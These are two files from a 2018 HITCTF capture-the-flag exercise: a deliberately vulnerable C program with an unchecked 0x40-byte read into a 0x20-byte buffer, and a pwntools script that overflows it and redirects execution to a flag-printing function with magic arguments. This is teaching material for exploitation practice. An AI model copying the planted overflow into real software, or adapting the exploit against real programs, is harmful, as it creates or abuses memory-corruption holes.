File: 2018-02-03-HITCTF/pwn/pwn100_stackoverflow/stackoverflow.py
from pwn import *

#io = process("./stackoverflow")
io = remote("127.0.0.1",40000)

io.recvuntil("name:\n")
#gdb.attach(io)
io.sendline("a" * 0x2c + p32(0x080485df) + p32(0x0804862D) + p32(0xdeadbeef) + p32(0xc0ffee))
print io.recvline()
print io.recvline()

File: 2018-02-03-HITCTF/pwn/pwn100_stackoverflow/stackoverflow.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

//gcc stackoverflow.c -fno-stack-protector -o stackoverflow

char *command = NULL;

void vuln();
void flag();
void CheckFailed();

void main()
{   
    setvbuf(stdout,NULL,_IONBF,0);
    setvbuf(stdin,NULL,_IONBF,0);
    vuln();
}

void vuln()
{
    char name[0x20];
    puts("Welcome to pwn world!\nLeave your name:");
    fflush(stdout);
    read(0,name,0x40);
    puts("bye~");
}

void flag(int var1, int var2)
{   
    if(var1 != 0xdeadbeef)
        CheckFailed();

    command = "cat flag";
    
    if(var2 != 0xc0ffee)
        CheckFailed();

    system(command);
}

void CheckFailed()
{
    printf("bad :(\n");
    exit(0);
}

